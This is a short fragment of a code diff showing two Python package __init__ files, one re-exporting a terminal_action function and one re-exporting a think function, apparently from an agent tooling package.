							`from .terminal_actions import terminal_action`


							`__all__ = ["terminal_action"]`
		`@@ -0,0 +1,4 @@`
							`from .thinking_actions import think`


							`__all__ = ["think"]`